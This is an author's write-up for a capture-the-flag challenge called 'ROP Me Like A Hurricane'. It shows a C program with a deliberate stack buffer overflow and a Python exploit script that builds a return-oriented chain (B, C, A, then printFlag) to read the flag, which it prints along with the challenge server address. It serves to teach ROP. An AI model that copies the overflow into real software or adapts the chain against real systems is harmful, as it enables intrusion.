# ROP Me Like A Hurricane Author Writeup

## Description

Didn't get an alien in Area51, but I found this...

*Hint*: Is there an order to the madness?

## A Word From The Author

This challenge was intended to be your "first" ROP challenge. All the necessary functions are present in the program, but there is an order needed to cat the flag.

## Information Gathering

``` c
#include <stdio.h>  // prints
#include <stdlib.h> // malloc
#include <string.h> // strcmp
#include <unistd.h> // read
#include <fcntl.h>  // open
#include <unistd.h> // close
#include <time.h>   // time

// "hidden" (unused) string for the remote explot of this challenge
char *remote = "nc chal.tuctf.com 31058";

#define FLAG_LEN 64

// 3 booleans to be set
int a = 0;
int b = 0;
int c = 0;

// 3
void A() {
	if (c && b) a = 1;
}

// 1
void B(int v) {
	b = 1;
}

// 2
void C() {
	if (b) c = 1;
}

void printFlag() {
	char *flag = malloc(64);
	int fd = open("./flag.txt", 0);

	if (a && b && c) {
		read(fd, flag, FLAG_LEN);
		printf("%s\n", flag);
	}

	close(fd);
}

void pwnme() {
	printf("You got this!\n> ");
	char buf[16];
	read(0, buf, 64);
}

int main() {
    setvbuf(stdout, NULL, _IONBF, 20);
    setvbuf(stdin, NULL, _IONBF, 20);

	pwnme();

    return 0;
}
```
Cool, so from the C code we can see that the variables *a*, *b*, and *c* must be set to propery print the flag. Also none of the functions are even called, we must use our ROP chain to set it all up.

If you simply execute the functions A(), B(), and then C() you will not properly set up the environment variables to pass the check in printFlag(). This is much easier to see than it is in assembly, which is one of the reasons I didn't supply the C code. Reading assembly is a very valuable skill, despite its growing pains.

This is how **C()** would look like in assembly:

![c.png](./res/fe6c179ef5b04bedaefa9adee707520c.png)

We can see that there is only one path to set all 3 flags: B->C->A. Knowing the path makes it easy for us to build a chain:

B() → C() → A() → printFlag()

Let's script that up.

## Exploitation

``` python
#!/usr/bin/env python
from thpoonpwn import *

elf,libc,args = pwninit(
    remcmd =    'chal.tuctf.com 31058',
    localcmd =  './rop_me_like_a_hurricane',
#    libcid =    '',
#    libcfile =  './',
    local =     True,
    pause =     True,
    copy =      True,
#    ldpreload = True,
#    debug=True
)
p = pwnstart(args)
#___________________________________________________________________________________________________
p.recv()
pad = 28

# ROPs
A =         flat(elf.sym['A'])
B =         flat(elf.sym['B'])
C =         flat(elf.sym['C'])
printFlag = flat(elf.sym['printFlag'])

payload = ''
payload += 'A'*pad
payload += B
payload += C
payload += A
payload += printFlag

p.send(payload)
print p.recv()

#___________________________________________________________________________________________________
pwnend(p, args)
```

![exploit.png](./res/c53b1aa95e2a491faefcfb1a2a34033d.png)

Since this was part of the mega challenge, the `nc chal.tuctf.com 31111` is the next part of the mega challenge (cryptography).


## Endgame

Hopefully this was a fun little challenge for those who are unexperienced with ROP chains.

> **flag:** TUCTF{bu7_c4n_y0u_ROP_bl1ndf0ld3d?}

